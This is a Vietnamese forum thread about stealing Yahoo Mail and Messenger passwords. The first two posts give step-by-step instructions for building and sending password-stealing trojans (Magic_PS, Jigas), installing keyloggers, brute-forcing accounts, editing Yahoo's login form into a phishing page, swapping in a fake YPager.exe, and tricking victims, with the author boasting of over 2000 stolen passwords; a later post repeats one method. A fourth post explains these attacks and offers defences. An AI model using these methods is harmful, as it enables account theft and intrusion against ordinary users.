Love Telling Tam Datu nhắn với viet 4rum.com: xd dang tim viec iphom.ban nao biet xin gioi thieu giup mjnh so dt 01050489136 phambao22 nhắn với ace: Làm thủ tục đi lao động nhật bản,du hoc hàn quốc....fb:Bảo bảo ductruong_korea nhắn với AcE viet4rum: Anh em yêu thích muonline hãy vào www.mu-korea.net nhé nuhoanggaigoc nhắn với everyone: 4 nam moi way lại forum. haiz lanh buon cha co ai chem gio anhlanhgia1 nhắn với viet4room: cần tìm việc Iphom khu vực miền bắc liên lạc cho mình nhé 010 4444 9289 . cảm ơn quangdao87vp nhắn với ace: Cho lau wa ma chua dc cap pep.buon wa huhu ductruong_korea nhắn với AcE viet4rum: Anh em yêu thích game muonline Vào www.mu-korea.net hội tụ nhé HUYTRAN88 nhắn với dien đàn: Busan tìm việc sxct lao động hợp pháp ai Biết ct nào nhận người xin dúp đỡ www.shopviethan nhắn với www.shoviethan: ace ơi ^..^ vào mùa thu rồi nhớ thoa kem dưỡng ẩm da nhé 010 4654 6631 anhlanhgia1 nhắn với 4rum: mình tìm việc iphom bạn nào biết alo nhé 010 4444 9289 cảm ơn nhiều

kết quả từ 1 tới 6 trên 6

Ðề tài: Vài Điều Cần Biết Về Lấy Trộm Mật Khẩu Yahoo Mail

 1. #1
  Tham gia ngày
  Feb 2008
  Đến từ
  Incheon, Korea
  Quê quán
  Ninh Bình
  Bài viết
  3,740
  Thanks
  958
  Thanked 4,567 Times in 1,214 Posts

  Mặc định Vài Điều Cần Biết Về Lấy Trộm Mật Khẩu Yahoo Mail

  Có rất nhiều cách để lấy trộm mật khẩu Yahoo Mail .Tuy nhiên việc lấy trộm dễ hay khó là tùy thuộc vào trình độ và khả năng của mỗi người khác nhau.Và cũng tùy vào từng trường hợp.
  Sau đây tôi sẽ trình bày cho các bạn vài cách mà tôi biết để các Bạn tham khảo.
  (Bài viết này tôi tìm hiểu và sưu tầm từ nhiều website khác ,nó chỉ mang tính chất tham khảo thôi ! Tôi không khuyến khích các Bạn quậy phá người khác và cũng như không chịu trách nhiệm về các hành động của các bạn !)

  Cách 1:
  Bạn hãy dùng con virus Magic_PS .Con này hiện nay đã phát triển đến phiên bản 1.63.
  Con này có 1 ưu điểm rất mạnh là lấy trộm Password qua con đường chat Yahoo Messenger.
  Nó được phát triển từ phiên bản 1.4 như hình sau :


  Rồi phiên bản 1.5 ra đời rất mạnh.Nó có những đặc tính mà phiên bản 1.4 không co' .Bạn có thể quan sát hình bên .
  Sau đây là cách hướng dẫn sử dụng :

  Trước hết bạn hãy Download phiên bản 1.5 của nó về
  .Sau đó để giải nén nó ra bạn phải tắt tất cả các phần mềm tiêu diệt virus như Norton Antivirus và hãy dùng phần mềm giải nén là Winzip hay Winrar để giải nén ra .
  sau khi giải nén Bạn hãy chạy tập tin file.exe .
  sẽ thấy giao diện phiên bản 1.5 như sau hình trên .
  .Phần Y!ID bạn hãy điền nick Yahoo của bạn vào .(Chú ý là nick chứ không phải Email)
  Con Magic_PS sau khi lấy Password nó sẽ gởi vào nick này thông qua đường chat
  .Sau đó nhấp vào Creat MPS .Nếu thành công nó sẽ tạo ra một tấp tin mới có tên là Sender.exe
  Bạn hãy gởi cái tập tin mới tạo được này cho nạn nhân để lấy pass.

  Như đã nói ở trên phiên bản 1.63 đã ra đời nó sẽ có những điểm mạnh hơn 1.5 đó là không bị Norton Antivirus phát hiện.Và nhiều điểm khác.
  Bạn hãy Download phiên bản 1.63 để cập nhật .Chú ý rằng phiền bản 1.63 chỉ chạy được khi bạn đã chạy phiên bản 1.5 trước đó rồi . Còn nếu không có 1.5 chạy trước ,phiên bản 1.63 nó sẽ không hoạt động được !


  Ngược lại nếu máy bạn lỡ nhiễm phải con Magic_PS 1.5 thì bạn hãy Download phần mềm Macgic_PS_15 Remover để gỡ nó .

  Cách 2:

  Nếu bạn truy cập Internet công cộng mà có vài người mới vào nghề và bất cẩn lưu lại Password ở máy khi nhấp chuột ở phần
  chọn lựa là Remember my ID on this computer đối với Mail Yahoo và Rememember my ID& Password đối với chat Yahoo Messenger .Tuy nhiên lúc này bạn chỉ nhìn thấy các kí tự ở dạng sao ******* và không thể biết đó là các kí tự gì .Nhưng không phải vì thế mà chúng ta chịu thua phải không nào ?
  Trứơc hết bạn hãy Download phần mềm soi Password này về .Sau khi Download về xong ,bạn hãy giải nén ra ,chạy tập tin file.exe .Sau đó hãy kéo chuột vào nơi có password là các kí tự ở dạng sao ***** và lúc này bạn sẽ nhìn thấy các kí tự đó là gì .

  Cách 3 :

  Bạn hãy dùng phần mềm dò tìm password email là Ybrute hoặc Brute Force để tìm .Bạn có thể tải phần mềm này về bằng cách vào Google.com.vn để tìm kiếm với từ khóa là "Ybrute" hoặc "Brute Force"

  Cách 4 :

  Để lấy password hòm thư Yahoo Mail bạn chỉ việc làm như sau :
  + gởi 1 bức thư tới địa chỉ : pw_return_center@yahoo.com
  +Subject: Đánh tên User cần lấy pass
  Ví dụ :victim (Đừng đánh victim@yahoo.com)
  +Phần nội dung bạn đánh như sau : (nhớ đừng thêm bất cứ cái gì )
  /config/cgi-bin/start?v703&login=ten login cua ban&f=password cua ban&f=27586&javascript=ACTIVE&rsa>
  Ví dụ :Tôi cần lấy pass hòm mail :emyeu@yahoo.com
  Hòm thư tôi là :nhoemchieuthubay@yahoo.com
  Password là :iloveyou
  tôi sẽ đánh nội dung là :
  Subject: emyeu
  Nội dung:

  /config/cgi-bin/start?v703&login=nhoemchieuthubay&f=iloveyou&f=275 86&javascript=ACTIVE&rsa>

  Cách 6: Bạn hãy dùng phần mềm Jigas.
  Trứơc hết bạn hãy Download nó về .Sau đó chạy file.exe như hình sau:

  +Phần Máy chủ SMTP:Bạn điền :mx1.mail.yahoo.com
  +Địa chỉ hòm thư:điền địa chỉ mail của bạn (Password sẽ gởi về hòm thư này )
  +Thông tin chú thích:điền cái gì cũng được!
  +Nhấp chọn lựa vào :Kích hoạt cùng Windows
  +Sau đó nhấp vào :Tạo tep--->Sẽ tạo ra 1 tập tin mới có dạng:
  Server.exe.
  +Bạn đính kèm tập tin này gởi mail cho người khác để lấy pass!
  Cách 5 :

  Bạn hãy dùng phần mềm keylogger để cài vào máy tính .Phần mềm này sau khi cài ,nó có khả năng ghi lại tất cả các thông tin mà người ngồi truy cập vào máy đó và gởi email của chúng ta bao gồm cả Username và Password.

  Cách7 :

  Bạn dùng Fake login .Có nghĩa là bạn hãy tạo 1 giao diện giống y hệt Mail Yahoo .Sau khi victim đăng nhập vào trang này User name và Password sẽ được gởi vào hòm thư của bạn.
  Bạn có thể Download Source về và chỉ cần chỉnh sửa lại bằng Email của bạn

  Cách8:
  Nếu Bạn biết đầy đủ thông tin của chủ nhân hòm mail bạn có thể lấy pass bằng cách Vào Đây để tham khảo


  Nguồn : haidang-hacker.blogspot.com
  Nguyễn Văn Quỳnh
  Y!M: tinhxanhmaimai2004

 2. Có 3 người đã cảm ơn QuynhKr cho bài viết này là :

  k02 (2010-10-26), newroads_dhxd (2011-09-14), NHAN_NGANKOREA8712 (2011-07-24)

 3. #2
  Tham gia ngày
  Feb 2008
  Đến từ
  Incheon, Korea
  Quê quán
  Ninh Bình
  Bài viết
  3,740
  Thanks
  958
  Thanked 4,567 Times in 1,214 Posts

  Mặc định Cach lay password tai tiem net

  *Cách1:
  Bạn đi chat và đã bao giờ để ý đến dòng Remember my ID & Password trong trang Login của YM chưa? Có rất nhiều người khi đi chat hay check dòng đó, YM sẽ lưu lại ID & Password của họ chỉ cần sử dụng phần mềm Caption It là bạn có thể dịch được cái dòng password **** đó. Vậy download phần mềm đó ở đâu? Bạn có thể down nó ngay trong trang chủ http://dear.to/mytrung trong mục Download. Thế còn sử dụng nó hê...hê dễ như ăn cháo vậy .Sau khi down nó về bạn sẽ thấy nó chỉ có duy nhất một file bạn chạy file đó rồi di chuột đến dòng password cần dịch password sẽ hiện ra trong box.

  *Cách2:
  Cách này thì có lẽ ít bạn để ý đến, đó là bạn sẽ làm cho windown tự động lưu lại ID & password mà chẳng thèm để ý xem nạn nhân có đồng ý hay không. Người khác có thể vào xem thư mà chẳng cần biết ID lẫn password, Windown sẽ lưu password vào file *.PWL trong Windown/System và chỉ cần dùng phần mềm ToolPWL là sẽ biết được passsword.
  Để làm điều đó bạn hãy vào Internet Explorer chọn Tools--> Internet Options...-->Chọn tag Content---> Auto Complete...--->đánh dấu chọn User name & password on form và Prompt me to save passwords.
  Vậy là windown sẽ lưu lại password mà chẳng thèm hỏi han gì cả.

  *Cách3:
  Cách này sử dụng phần mềm KeyLogger5.0, chức năng của nó là ghi lại tất cả những gì nạn nhân đánh ở bàn phím ID, password...tất tần tật. Nó lại còn có thể chụp lại màn hình sau khoảng thời gian mà bạn định sẵn nữa chứ- nó có chế độ tự huỷ theo ngày mà bạn chọn. Tất cả mọi thứ sẽ được lưu lại và gửi về email cho bạn chỉ cần email của bạn có hỗ trợ pop chẳng hạn như hotmail- còn yahoo thì hết free lâu rồi. Bạn chỉ cần download nó về chạy nó ở bất cứ đâu bạn có thể dâu nó ở một chỗ mà nạn nhân khó phát hiện nhất- sau đó bạn setting cho nó, cái này cũng chẳng khó khăn gì nếu bạn đã từng xài bomb mail thì setting cho cái này cũng tương tự thôi. Bạn cũng có thể cài mật khẩu để chỉ một mình bạn sử dụng được mà thôi. Mà cái quan trọng là mấy "anh chàng vệ sĩ" Anti_Virus hay Trojan Remove chẳng thể phát hiện nổi nó. Thế download nó ở đâu? Vâng hãy vào trang chủ http://dear.to/mytrung vào mục Download để down nó về.
  Vậy thì làm thế nào để biết máy mình có dính nó không? Bạn hãy đặt chế độ "firewall" cho NAV để khi có file gửi đi nó sẽ thông báo cho bạn biết, nếu bạn thấy nghi ngờ hãy vào Star-->Seach để tìm xem có mặt nó hay không nếu có thì delete nó đi là xong.

  *Cách4:
  Cách này chúng ta sẽ tạo một trang giao diện giống Yahoo Mail để khi nạn nhân check mail thì password sẽ gửi về hộp thư cuả bạn. Làm sao để tạo đây hê...hê hãy yên tâm bạn chẳng cần biết chút gì về thiết kế web cũng có thể làm được.
  Đầu tiên bạn hãy vào http://mail.yahoo.com/ sau đó chọn menu File-->Save AS để ghi trang đó lại, hãy nhớ xem bạn ghi lại ở đâu nhé! Bây giờ hãy mở Notepad ra ( Star/Programs File/Accessories/Notepad). Chọn File/Open để mở trang Yahoo Mail bạn vừa ghi ra, bạn tìm đến dòng sau :
  Code:
  <FORM name=login_form
  onsubmit="return hash(this,'http://login.yahoo.com/config/login')"
  action=https://login.yahoo.com/config/login?c17b5ebqs944v
  method=post autocomplete="off">  Bạn hãy sửa nó lại như sau:


  <FORM method="post" action="maito:địa chỉ email của bạn">  Ví dụ: email của tui là tinhyeumauhong@kiss.to thì dòng đó sẽ là action="maito:tinhyeumauhong@kiss.to"

  Xong xuôi bạn chọn Save để ghi lại.Tìm đến nơi bạn ghi file Yahoo Mail đó click chuột phải vào chọn Send to-->Desktop.File đó sẽ được đưa ra màn hình, bạn hãy rename nó cho hấp dẫn chút kiểu kiểu như: "Yahoo Mail" hay "Check Mail" chẳng hạn... giờ thì ngồi chờ để xem có "gà" nào check mail không là OK! He..he.

  *Cách5:
  Cách này giống như cách bạn tìm lại password khi bạn quên, bạn hãy đọc bài "Tìm password email bị mất" ở trang chủ để biết thêm. Cách này khó nhất là trả lời câu hỏi bí mật của nạn nhân- he..he không biết bạn thế nào chứ tui thì lấy được kha khá password bằng cách này .

  *Cách6:
  Trước khi nói đến cách này thì xin được gửi lời xin lỗi đến các bạn đã làm theo Cách 2 trong bài "lấy password email yahoo" ở trang chủ. Mình không có ý định lừa để lấy pass của ai cả mà chỉ muốn cho các bạn biết đó cũng là một cách hack. Hiệu quả của nó ư? Hê..hê bằng cách đó mình lấy được hơn 2000 password email. Cũng chỉ vì nhóc Hope$un post cách đó bên hackervn mà thư cứ gửi về lườm lượp, lại còn lên cả báo Sinh viên Viêt Nam nữa chứ. Ho..ho
  Nào bạn hãy đăng ký 1 địa chỉ email Yahoo đại loại như Showmepassword@yahoo, return_pass@yahoo, hay lookup_pass@yahoo... chẳng hạn, sau đó dụ victim giống như mình đã làm các bạn có thể dựa vào đó... !

  *Cách7:
  Cách này chúng ta sẽ tạo một face giống Yahoo Messenger để khi victim đi chat, nhập ID & Password thì nó sẽ lưu lại. Đầu tiên bạn cần down YahooFace trong mục download ở trang chủ, giải nén nó bạn sẽ có 2 file: yahoo.mdb và YPager.exe. Bạn hãy copy file yahoo vào ổ C:\, tiếp đến bạn copy file YPager đến thư mục cài đặt Yahoo Messenger thường thì nó nằm ở C:\Programs Files\Yahoo\Messenger, trước khi paste file YPager bạn lên rename file YPager có trước trong đó thành YPager1 chẳng hạn sau đó đưa nó ra màn hình để khi login vào face Yahoo của mình không được thì victim có thể chọn cái shortcut đó để vào Yahoo Messenger một cách bình thường , rồi paste file YPager mà bạn vừa down về, vậy là xong rồi đó khi nạn nhân login thì ID & Password vào file yahoo.mdb, để xem bạn hãy chạy file YPager click vào nút Search rồi đánh vào password login123 để xem danh sách các nạn nhân, để lấy được file yahoo.mdb bạn có thể sử dụng phần mềm Stealmail để nó gửi về mail cho bạn.
  Nguyễn Văn Quỳnh
  Y!M: tinhxanhmaimai2004

 4. Người đã cám ơn QuynhKr cho bài viết này là :

  NHAN_NGANKOREA8712 (2011-07-24)

 5. #3
  Tham gia ngày
  Jul 2008
  Đến từ
  봉담-수원
  Quê quán
  Hải Phòng
  Tuổi
  28
  Bài viết
  163
  Thanks
  396
  Thanked 50 Times in 27 Posts

  Mặc định

  thiên địa ơi thế này thì khác gì bưng cá tới miệng mèo chứ,ai sẽ là nạn nhân đây híc
  gainhalanh_hp@yahoo.com Sống trên đời mới chỉ là một nửa,biết bao giờ mới tìm được nửa thứ hai...?

  http://www.facebook.com/kutelove.lethuong?sk=photos

 6. #4
  Tham gia ngày
  Mar 2008
  Đến từ
  Goyang
  Quê quán
  Nam Ðịnh
  Bài viết
  1,172
  Thanks
  248
  Thanked 794 Times in 223 Posts

  Mặc định Hack Pass Yahoo và những điều cần tránh !


  Gần đây một số người dùng Yahoo , kêu trời rằng " bị mất pass Yahoo" .

  Cách sử dụng hiện nay mà một số kẻ dùng để lừa đảo là Fake Login .Đầu tiên bạn nhận được 1 ecard hoặc 1 cái link trong email hoặc inbox 360 của bạn,khi bạn click vào đường link trên mess đó ,một cửa sổ popup lập tức được nảy ra ở cửa sổ pupop này 1 trang login mới giao diện giống hệt trang login của Yahoo ! cẩn thận đừng có login vào ! page đó đã được nhúng sẵn soucre chôm pw của các bạn


  Nếu bạn để ý kỹ thì trên thanh Andress Link : sẽ là địa chỉ http://abc.com chứ không phải là Yahoo.com !

  Các phòng chống : Luôn luôn quan sát trên thanh address bar xem mình có mở đúng trang web cần dùng hay không !Chỉ login vào mail ( blog ) bằng cách gõ chính xác địa chỉ http://www.yahoo.com !

  Fake Yahoo Messenger : Cũng tương tự như vậy, hacker sẽ dùng một chương trình có giao diện gần giống với Yahoo Messenger, đặt tên là Ypager.exe, chép đè lên file Ypager.exe của chương trình Yahoo Messenger. Nếu bạn đăng nhập, password sẽ bị “chôm” ngay lập tức.

  Cách phòng chống : Chương trình Fake Yahoo Messenger nói chung là khá giống giao diện thật của Yahoo Messenger, tuy nhiên vẫn có thể phân biệt được nếu bạn quan sát kỹ. Vì vậy trước khi chat hãy dành ra vài phút “nghiệm” xem có đúng Yahoo Messenger thứ thiệt không rồi hãy đăng nhập. Gợi ý : Chú ý font chữ, nó có hơi khác nhau một xíu đó !
  ***************
  Dùng keylogger


  Keylogger là một chương trình ghi nhận tất cả những gì bạn gõ vào từ bàn phím. Phổ biến nhất là Family Keylogger và Perfect Keylogger. Hacker cài keylogger vào máy để ghi nhận ID và password của bạn.

  Cách phòng chống : Nhìn trên Task Bar, nếu thấy chương trình lạ đang chạy thường trú thì đóng nó lại ngay, có thể nhấp Ctrl-Alt-Del để kiểm tra các chương trình đang chạy và phát hiện hiện được Keylogger. Ngoài ra, khi đăng nhập hộp mail và Yahoo Messenger, bạn nên gõ một chuỗi loằng ngoằng các ký tự, trong đó có ID & password của bạn, rồi dùng chuột copy & paste vào hộp thoại đăng nhập.
  ****************
  Dịch ngược chuỗi ký tự dạng ***


  Nếu bạn có thói quen dùng chức năng Remember ID & Password, hacker sẽ dùng một chương trình chuyên dụng để biên dịch chuỗi password dạng *** của bạn ra ký tự thường, và “chôm” luôn hộp mail.

  Cách phòng chống : Không dùng chức năng Remember ID & Password.

  ***************

  Dùng chức năng lưu password tự động của trình duyệt IE


  Hacker sẽ chọn chế độ tự động lưu password trong trình duyệt Internet Explorer, khi bạn đăng nhập hộp mail sẽ nhận được popup thông báo có muốn lưu password tự động hay không, bạn đọc không hiểu gì cả và cứ Yes đại thì rất nguy hiểm.

  Cách phòng chống : Khi nhận hộp thoại thông báo, nếu đọc không hiểu nên nhờ người khác dịch giúp chứ không nên click đại.
  ***************
  Đánh lừa người dùng mail

  Phương pháp này nghe qua có vẻ ngớ ngẩn, nhưng phần lớn các bạn mất password chính vì bị đánh lừa. Hacker gửi đến bạn một email vớ vẩn nào nó, ví dụ mạo danh webmaster của Yahoo, bảo rằng Yahoo bị tấn công và phải tiến hành cải tổ, nếu bạn không gửi ID & Password cho hắn trong một tuần hắn sẽ del account, bạn hoảng sợ gửi ngay và thế là tiêu. Hoặc một chiêu khác : Hacker nói rằng nếu bạn muốn biết passoword của ai chỉ việc mail đến một địa chỉ nào đó (hack_password_mail@yahoo.com chẳng hạn), nội dung là #% “ID của bạn” *&(&^(()_%$ “Password của bạn” *&%$ “ID người cần hack” (đoạn loằng ngoằng &#*$^!$ chỉ là để đánh lạc hướng bạn chứ chẳng có tác dụng gì cả), password người cần hack sẽ được gửi cho bạn ngay ! Bạn nghe theo, và thế là chưa hack được ai bạn đã bị đánh cắp password. Nói chung đánh lừa thì có rất nhiều chiêu, tôi chỉ nêu vài trường hợp chứ không bao quát hết được.
  Cách phòng chống : Không gửi password cho bất kỳ một điạ chỉ email nào, mặc dù có thể điạ chỉ đó nghe rất “webmaster” (admin-yahoo@yahoo.com chẳng hạn).
  *****************

  Quan trọng đây !


  Cách đặt mật khẩu để khó bị xơi tái
  Ŀể đặt mật khẩu hộp thư Yahoo một cách an toàn, bạn có thể dùng các ký tự không có trên bàn phím để thêm vào mật khẩu. Bằng cách giữ phím Alt sau đó nhấn một số bên bàn phím số rồi thả Alt ra, bạn sẽ có những ký tự bất ngờ.

  Ví dụ:
  Khi giữ phím Alt và bấm số 0169 bên bàn phím số sẽ có ©
  Alt + 0151 ---> — (không phải dấu trừ " - ")
  Alt + 0156 ---> œ (chữ quái gì ấy nhở....)
  Alt + 0137 ---> ‰
  Alt + 0169 ---> © (Copyright)
  Alt + 0174 ---> ® (Register)
  Alt + 0131----> ƒ (dùng làm ƒ(x) thì tuyệt )
  Tôi có một mật khẩu là aaaÆ = aaaAlt+0198
  Những mã kỳ dị ở trên bạn có thể tham khảo trong mục Character Map để biết được nhiều thứ hay ho hơn. (Start Menu --> All Programs --> Accessories --> System Tools ---> Character Map)

  Và sau đây là mẹo để bảo vệ mật khẩu của tôi, nếu dùng mật khẩu này, dù người khác có nhìn thấy mật khẩu đi chăng nữa cũng chưa chắc lần ra được chính xác. Cách này có thể chống được fake login, trojan, một vài con keylog bình thương. Chống chỉ định với loại keylog nào có thể túm được tất cả những gì mình nhập vào từ bàn phím (có loại keylog nào có khả năng này không nhỉ?? Mọi người con cho tôi biết với)

  Ŀể người ta nhìn thấy mật khẩu mà không biết nó là gì thì chỉ có cách là "thấy mà không thấy" . Bạn cũng biết trên bàn phím có một phím tạo ra ký tự không thấy được đó là phím space - phím dấu cách. Bạn có thể kết hợp vài phát space đằng sau mật khẩu chữ để tăng thêm tính an toàn, tên ăn cắp chỉ lo gõ chỗ mật khẩu thấy được mà không để ý đến phần "tàng hình". Khổ nỗi những ký tự space vẫn chiếm một vài vị trí đằng sau mật khẩu và nếu tên ăn cắp thấy có 2 chữ a và một mớ khoảng trống đằng sau thì hắn sẽ đoán ra ngay và có thể mò ra (nếu hắn là dân chuyên nghiệp chứ vài chú gà hiện nay hay đi ăn cắp pass thì ít biết lắm). Ŀấy là bảo mật vòng 1, sơ sài để chống kẻ ăn cắp pass là gà. Ở bước sau, tôi sẽ hướng dẫn cách để chống cả kẻ ăn cắp pass chuyên nghiệp có kiến thức với IT.

  Là dân IT thì các bạn cũng biết có một mã ASCII biểu diễn ký tự trống, ký tự này mới chính xác là ký tự trống, rỗng, không phải là một tập hợp có một số không (0) mà là tập hợp không có phần tử nào, rỗng tức là không có gì chứ không không phải là số không (0) (chết roài..... dài dòng quá)..... Ŀại khái ký tự này là ký tự không nhìn thấy được thứ 2 (ngoài space) mà ta có thể tạo ra từ bàn phím bằng cách giữ phím Alt và bấm 255. Bạn có thể dùng cách này để tạo nên một thư mục không tên, một file không có tên (xuất phát từ đây mà tôi có ý tưởng này). Và thế là ta có thể dùng kết hợp phím này và space để tạo một mật khẩu không nhìn thấy được. Ví dụ:
  Alt+255, space, space, space, Alt+255, space --> 6 ký tự không thấy được, đủ làm một mật khẩu không thấy được cho Yahoo
  space,Alt+255,Alt+255,space,space,space ---> 6 ký tự khác.
  space, Alt+255, Alt+255, Alt+255, space, Alt+255 ---> mật khẩu khác nữa.
  .....
  .....
  Tổ hợp chập 6 của 2 phần tử được bao nhiêu kết quả ấy nhỉ??? mời anh hacker ngồi dò. Mà nếu bạn hứng chí làm 8 hay 10 ký tự thì cho dò cả năm .

  Nếu bạn cần bảo mật thêm nữa thì hãy gõ space và Alt+255 ra một chỗ nào đó, sau đó dùng chuột để lấy từng ký tự mà ghép vào thành mật khẩu ..... dưng mà công phu quá nhỉ..... chúng ta đâu cần an toàn đến mức l**ng kính + két sắt + lòng đất như thế. Chỉ cần 6 phát ký tự vô hình kia cũng đủ cho ta chat trong thanh thản rồi .
  * Cách đơn giản hơn : copy đại 1 dòng nào đó mặc định có trên PC làm pass ( my computer chẳng hạn ) mỗi lần login thì chỉ đánh ID còn pass dùng chuột copy chữ mycomputer vào thế là xong .Đơn giản và cực kỳ hiểu quả !
  Mã của đoạn code Fake login đây :

  khi bạn vào mess thì đoạn script này sẽ link đến cái địa chỉ http://72.52.219.70 kia và ở đấy nó có 1 form đăng nhập giống hệt form login của Yahoo... nên các bạn dễ bị lừa...


  Tìm hiểu về địa chỉ kia tớ thấy nó là của host.visaoyeu.info

  User quản trị của nó là: user/pass : admin/visaoyeu.info

  và nó thuê của www.liquidweb.com


  ..

  con này sẽ lan truyền zất nhanh... các bạn nên cẩn thận ..

  cách để ko bị dính là các bạn disable script của trình duyệt web đi
  Vào internet options/ vào tab Security / Custom level ... rồi tìm đến disable Active Scripting

  xong rồi vào mailbox xoá cái mess đấy đi là ok .. (xoá xong mess thì enable lại cái script nhớ ^^ )

  ai dính rùi thì mau đổi pass nhớ  Bạn nào dùng Firefox thì tham khảo cách phòng chống của anh VNIT.
  Bạn cài Add On này cho Fire Fox:

  https://addons.mozilla.org/en-US/firefox/addon/1237

  Và tắt Java Script đi là xong
  Chúc các bạn cuối tuần vui vẻ và mong đọc xong bài viết này vui lòng thông báo cho bạn bè để không ai phải kêu la "mất pass rồi " nữa nhé ! 7. #5
  Tham gia ngày
  Jul 2008
  Đến từ
  봉담-수원
  Quê quán
  Hải Phòng
  Tuổi
  28
  Bài viết
  163
  Thanks
  396
  Thanked 50 Times in 27 Posts

  Mặc định

  Hoan hô anh depzai vỏ quyt dầy có móng tay nhọn rùi
  gainhalanh_hp@yahoo.com Sống trên đời mới chỉ là một nửa,biết bao giờ mới tìm được nửa thứ hai...?

  http://www.facebook.com/kutelove.lethuong?sk=photos

 8. #6
  Tham gia ngày
  Feb 2008
  Đến từ
  AnSan
  Quê quán
  Hà Tây
  Tuổi
  34
  Bài viết
  486
  Thanks
  0
  Thanked 8 Times in 8 Posts

  Mặc định

  Cách này chúng ta sẽ tạo một face giống Yahoo Messenger để khi victim đi chat, nhập ID & Password thì nó sẽ lưu lại. Đầu tiên bạn cần down YahooFace trong mục download ở trang chủ, giải nén nó bạn sẽ có 2 file: yahoo.mdb và YPager.exe. Bạn hãy copy file yahoo vào ổ C:\, tiếp đến bạn copy file YPager đến thư mục cài đặt Yahoo Messenger thường thì nó nằm ở C:\Programs Files\Yahoo\Messenger, trước khi paste file YPager bạn lên rename file YPager có trước trong đó thành YPager1 chẳng hạn sau đó đưa nó ra màn hình để khi login vào face Yahoo của mình không được thì victim có thể chọn cái shortcut đó để vào Yahoo Messenger một cách bình thường , rồi paste file YPager mà bạn vừa down về, vậy là xong rồi đó khi nạn nhân login thì ID & Password vào file yahoo.mdb, để xem bạn hãy chạy file YPager click vào nút Search rồi đánh vào password login123 để xem danh sách các nạn nhân, để lấy được file yahoo.mdb bạn có thể sử dụng phần mềm Stealmail để nó gửi về mail cho bạn.
  cái Cách này chúng ta sẽ tạo một face giống Yahoo Messenger để khi victim đi chat, nhập ID & Password thì nó sẽ lưu lại. Đầu tiên bạn cần down YahooFace trong mục download ở trang chủ, giải nén nó bạn sẽ có 2 file: yahoo.mdb và YPager.exe. Bạn hãy copy file yahoo vào ổ C:\, tiếp đến bạn copy file YPager đến thư mục cài đặt Yahoo Messenger thường thì nó nằm ở C:\Programs Files\Yahoo\Messenger, trước khi paste file YPager bạn lên rename file YPager có trước trong đó thành YPager1 chẳng hạn sau đó đưa nó ra màn hình để khi login vào face Yahoo của mình không được thì victim có thể chọn cái shortcut đó để vào Yahoo Messenger một cách bình thường , rồi paste file YPager mà bạn vừa down về, vậy là xong rồi đó khi nạn nhân login thì ID & Password vào file yahoo.mdb, để xem bạn hãy chạy file YPager click vào nút Search rồi đánh vào password login123 để xem danh sách các nạn nhân, để lấy được file yahoo.mdb bạn có thể sử dụng phần mềm Stealmail để nó gửi về mail cho bạn.

  cái YahooFace ở đâu có vậy các bạn

Chủ đề giống nhau

 1. Có thời gian thì vào đọc
  By vietnews in forum Bàn luận cuộc sống
  Trả lời: 3
  Bài mới: 2009-08-27, 09:16 PM
 2. Thế giới đồ chơi thông minh bằng gỗ Vũ Tiến
  By ctythuongmaivutien in forum Các Dịch Vụ Việt -Hàn
  Trả lời: 1
  Bài mới: 2008-08-28, 02:06 PM
 3. 3 điều nên biết
  By lehuy in forum Truyện/Thơ
  Trả lời: 0
  Bài mới: 2008-06-24, 07:57 PM

Quyền Hạn Của Bạn

 • Bạn không thể gửi đề tài mới
 • You may not post replies
 • You may not post attachments
 • You may not edit your posts
 •